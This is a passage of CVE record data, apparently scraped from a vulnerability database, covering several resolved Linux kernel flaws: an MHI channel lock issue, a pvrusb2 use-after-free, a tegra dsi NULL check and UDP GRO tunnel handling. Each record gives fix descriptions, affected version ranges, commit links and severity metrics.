"version": "1d3173a3bae7039b765a0956e3e4bf846dbaacb8",
"versionType": "git"
},
{
"lessThan": "eaefb9464031215d63c0a8a7e2bfaa00736aa17e",
"status": "affected",
"version": "1d3173a3bae7039b765a0956e3e4bf846dbaacb8",
"versionType": "git"
},
{
"lessThan": "b8eff20d87092e14cac976d057cb0aea2f1d0830",
"status": "affected",
"version": "1d3173a3bae7039b765a0956e3e4bf846dbaacb8",
"versionType": "git"
},
{
"lessThan": "01bd694ac2f682fb8017e16148b928482bc8fa4b",
"status": "affected",
"version": "1d3173a3bae7039b765a0956e3e4bf846dbaacb8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/bus/mhi/host/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: mhi: host: Drop chan lock before queuing buffers\n\nEnsure read and write locks for the channel are not taken in succession by\ndropping the read lock from parse_xfer_event() such that a callback given\nto client can potentially queue buffers and acquire the write lock in that\nprocess. Any queueing of buffers should be done without channel read lock\nacquired as it can result in multiple locks and a soft lockup.\n\n[mani: added fixes tag and cc\u0027ed stable]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:56.532Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/20a6dea2d1c68d4e03c6bb50bc12e72e226b5c0e"
},
{
"url": "https://git.kernel.org/stable/c/6e4c84316e2b70709f0d00c33ba3358d9fc8eece"
},
{
"url": "https://git.kernel.org/stable/c/3c5ec66b4b3f6816f3a6161538672e389e537690"
},
{
"url": "https://git.kernel.org/stable/c/eaefb9464031215d63c0a8a7e2bfaa00736aa17e"
},
{
"url": "https://git.kernel.org/stable/c/b8eff20d87092e14cac976d057cb0aea2f1d0830"
},
{
"url": "https://git.kernel.org/stable/c/01bd694ac2f682fb8017e16148b928482bc8fa4b"
}
],
"title": "bus: mhi: host: Drop chan lock before queuing buffers",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52493",
"datePublished": "2024-02-29T15:52:11.074Z",
"dateReserved": "2024-02-20T12:30:33.304Z",
"dateUpdated": "2025-05-04T07:37:56.532Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52445 (GCVE-0-2023-52445)
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: pvrusb2: fix use after free on context disconnection
Upon module load, a kthread is created targeting the
pvr2_context_thread_func function, which may call pvr2_context_destroy
and thus call kfree() on the context object. However, that might happen
before the usb hub_event handler is able to notify the driver. This
patch adds a sanity check before the invalid read reported by syzbot,
within the context disconnection call stack.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 Version: e5be15c63804e05b5a94197524023702a259e308 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.783Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec36c134dd020d28e312c2f1766f85525e747aab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47aa8fcd5e8b5563af4042a00f25ba89bef8f33d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3233d8bf7893550045682192cb227af7fa3defeb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec3634ebe23fc3c44ebc67c6d25917300bc68c08"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/30773ea47d41773f9611ffb4ebc9bda9d19a9e7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2cf0005d315549b8d2b940ff96a66c2a889aa795"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/437b5f57732bb4cc32cc9f8895d2010ee9ff521c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ded85b0c0edd8f45fec88783d7555a5b982449c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52445",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:02:46.257371Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:51.682Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/pvrusb2/pvrusb2-context.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ec36c134dd020d28e312c2f1766f85525e747aab",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "47aa8fcd5e8b5563af4042a00f25ba89bef8f33d",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "3233d8bf7893550045682192cb227af7fa3defeb",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "ec3634ebe23fc3c44ebc67c6d25917300bc68c08",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "30773ea47d41773f9611ffb4ebc9bda9d19a9e7e",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "2cf0005d315549b8d2b940ff96a66c2a889aa795",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "437b5f57732bb4cc32cc9f8895d2010ee9ff521c",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
},
{
"lessThan": "ded85b0c0edd8f45fec88783d7555a5b982449c1",
"status": "affected",
"version": "e5be15c63804e05b5a94197524023702a259e308",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/pvrusb2/pvrusb2-context.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.26"
},
{
"lessThan": "2.6.26",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: pvrusb2: fix use after free on context disconnection\n\nUpon module load, a kthread is created targeting the\npvr2_context_thread_func function, which may call pvr2_context_destroy\nand thus call kfree() on the context object. However, that might happen\nbefore the usb hub_event handler is able to notify the driver. This\npatch adds a sanity check before the invalid read reported by syzbot,\nwithin the context disconnection call stack."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:41.651Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ec36c134dd020d28e312c2f1766f85525e747aab"
},
{
"url": "https://git.kernel.org/stable/c/47aa8fcd5e8b5563af4042a00f25ba89bef8f33d"
},
{
"url": "https://git.kernel.org/stable/c/3233d8bf7893550045682192cb227af7fa3defeb"
},
{
"url": "https://git.kernel.org/stable/c/ec3634ebe23fc3c44ebc67c6d25917300bc68c08"
},
{
"url": "https://git.kernel.org/stable/c/30773ea47d41773f9611ffb4ebc9bda9d19a9e7e"
},
{
"url": "https://git.kernel.org/stable/c/2cf0005d315549b8d2b940ff96a66c2a889aa795"
},
{
"url": "https://git.kernel.org/stable/c/437b5f57732bb4cc32cc9f8895d2010ee9ff521c"
},
{
"url": "https://git.kernel.org/stable/c/ded85b0c0edd8f45fec88783d7555a5b982449c1"
}
],
"title": "media: pvrusb2: fix use after free on context disconnection",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52445",
"datePublished": "2024-02-22T16:21:37.784Z",
"dateReserved": "2024-02-20T12:30:33.291Z",
"dateUpdated": "2025-05-04T07:36:41.651Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52650 (GCVE-0-2023-52650)
Vulnerability from cvelistv5
Published
2024-05-01 12:53
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/tegra: dsi: Add missing check for of_find_device_by_node
Add check for the return value of of_find_device_by_node() and return
the error if it fails in order to avoid NULL pointer dereference.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f Version: e94236cde4d519cdecd45e2435defba33abdc99f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52650",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T19:31:29.279840Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-13T19:31:41.334Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.316Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47a13d0b9d8527518639ab5c39667f69d6203e80"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f05631a8525c3b5e5994ecb1304d2d878956c0f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92003981a6df5dc84af8a5904f8ee112fa324129"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93128052bf832359531c3c0a9e3567b2b8682a2d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50c0ad785a780c72a2fdaba10b38c645ffb4eae6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52aa507148c4aad41436e2005d742ffcafad9976"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c5d2342d24ef6e08fc90a529fe3dc59de421a2b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3169eaf1365541fd8e521091010c44fbe14691fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afe6fcb9775882230cd29b529203eabd5d2a638d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/tegra/dsi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "47a13d0b9d8527518639ab5c39667f69d6203e80",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "f05631a8525c3b5e5994ecb1304d2d878956c0f5",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "92003981a6df5dc84af8a5904f8ee112fa324129",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "93128052bf832359531c3c0a9e3567b2b8682a2d",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "50c0ad785a780c72a2fdaba10b38c645ffb4eae6",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "52aa507148c4aad41436e2005d742ffcafad9976",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "c5d2342d24ef6e08fc90a529fe3dc59de421a2b9",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "3169eaf1365541fd8e521091010c44fbe14691fc",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
},
{
"lessThan": "afe6fcb9775882230cd29b529203eabd5d2a638d",
"status": "affected",
"version": "e94236cde4d519cdecd45e2435defba33abdc99f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/tegra/dsi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.19"
},
{
"lessThan": "3.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: dsi: Add missing check for of_find_device_by_node\n\nAdd check for the return value of of_find_device_by_node() and return\nthe error if it fails in order to avoid NULL pointer dereference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:40:52.466Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/47a13d0b9d8527518639ab5c39667f69d6203e80"
},
{
"url": "https://git.kernel.org/stable/c/f05631a8525c3b5e5994ecb1304d2d878956c0f5"
},
{
"url": "https://git.kernel.org/stable/c/92003981a6df5dc84af8a5904f8ee112fa324129"
},
{
"url": "https://git.kernel.org/stable/c/93128052bf832359531c3c0a9e3567b2b8682a2d"
},
{
"url": "https://git.kernel.org/stable/c/50c0ad785a780c72a2fdaba10b38c645ffb4eae6"
},
{
"url": "https://git.kernel.org/stable/c/52aa507148c4aad41436e2005d742ffcafad9976"
},
{
"url": "https://git.kernel.org/stable/c/c5d2342d24ef6e08fc90a529fe3dc59de421a2b9"
},
{
"url": "https://git.kernel.org/stable/c/3169eaf1365541fd8e521091010c44fbe14691fc"
},
{
"url": "https://git.kernel.org/stable/c/afe6fcb9775882230cd29b529203eabd5d2a638d"
}
],
"title": "drm/tegra: dsi: Add missing check for of_find_device_by_node",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52650",
"datePublished": "2024-05-01T12:53:12.145Z",
"dateReserved": "2024-03-06T09:52:12.097Z",
"dateUpdated": "2025-05-04T07:40:52.466Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35884 (GCVE-0-2024-35884)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
udp: do not accept non-tunnel GSO skbs landing in a tunnel
When rx-udp-gro-forwarding is enabled UDP packets might be GROed when
being forwarded. If such packets might land in a tunnel this can cause
various issues and udp_gro_receive makes sure this isn't the case by
looking for a matching socket. This is performed in
udp4/6_gro_lookup_skb but only in the current netns. This is an issue
with tunneled packets when the endpoint is in another netns. In such
cases the packets will be GROed at the UDP level, which leads to various
issues later on. The same thing can happen with rx-gro-list.
We saw this with geneve packets being GROed at the UDP level. In such
case gso_size is set; later the packet goes through the geneve rx path,
the geneve header is pulled, the offset are adjusted and frag_list skbs
are not adjusted with regard to geneve. When those skbs hit
skb_fragment, it will misbehave. Different outcomes are possible
depending on what the GROed skbs look like; from corrupted packets to
kernel crashes.
One example is a BUG_ON[1] triggered in skb_segment while processing the
frag_list. Because gso_size is wrong (geneve header was pulled)
skb_segment thinks there is "geneve header size" of data in frag_list,
although it's in fact the next packet. The BUG_ON itself has nothing to
do with the issue. This is only one of the potential issues.
Looking up for a matching socket in udp_gro_receive is fragile: the
lookup could be extended to all netns (not speaking about performances)
but nothing prevents those packets from being modified in between and we
could still not find a matching socket. It's OK to keep the current
logic there as it should cover most cases but we also need to make sure
we handle tunnel packets being GROed too early.
This is done by extending the checks in udp_unexpected_gso: GSO packets
lacking the SKB_GSO_UDP_TUNNEL/_CSUM bits and landing in a tunnel must
be segmented.
[1] kernel BUG at net/core/skbuff.c:4408!
RIP: 0010:skb_segment+0xd2a/0xf70
__udp_gso_segment+0xaa/0x560
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9fd1ff5d2ac7181844735806b0a703c942365291 Version: 9fd1ff5d2ac7181844735806b0a703c942365291 Version: 9fd1ff5d2ac7181844735806b0a703c942365291 Version: 9fd1ff5d2ac7181844735806b0a703c942365291 Version: 9fd1ff5d2ac7181844735806b0a703c942365291 Version: 9fd1ff5d2ac7181844735806b0a703c942365291 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35884",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:37:18.298363Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-13T18:46:28.924Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.465Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3391b157780bbedf8ef9f202cbf10ee90bf6b0f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d49ae15a5767d4e9ef8bbb79e42df1bfebc94670"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d12245080cb259d82b34699f6cd4ec11bdb688bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3001e7aa43d6691db2a878b0745b854bf12ddd19"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35fe0e0b5c00bef7dde74842a2564c43856fbce4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d010c8031e39f5fa1e8b13ada77e0321091011f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/udp.h",
"net/ipv4/udp.c",
"net/ipv4/udp_offload.c",
"net/ipv6/udp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3391b157780bbedf8ef9f202cbf10ee90bf6b0f8",
"status": "affected",
"version": "9fd1ff5d2ac7181844735806b0a703c942365291",
"versionType": "git"
},
{
"lessThan": "d49ae15a5767d4e9ef8bbb79e42df1bfebc94670",
"status": "affected",
"version": "9fd1ff5d2ac7181844735806b0a703c942365291",
"versionType": "git"
},
{
"lessThan": "d12245080cb259d82b34699f6cd4ec11bdb688bd",
"status": "affected",
"version": "9fd1ff5d2ac7181844735806b0a703c942365291",
"versionType": "git"
},
{
"lessThan": "3001e7aa43d6691db2a878b0745b854bf12ddd19",
"status": "affected",
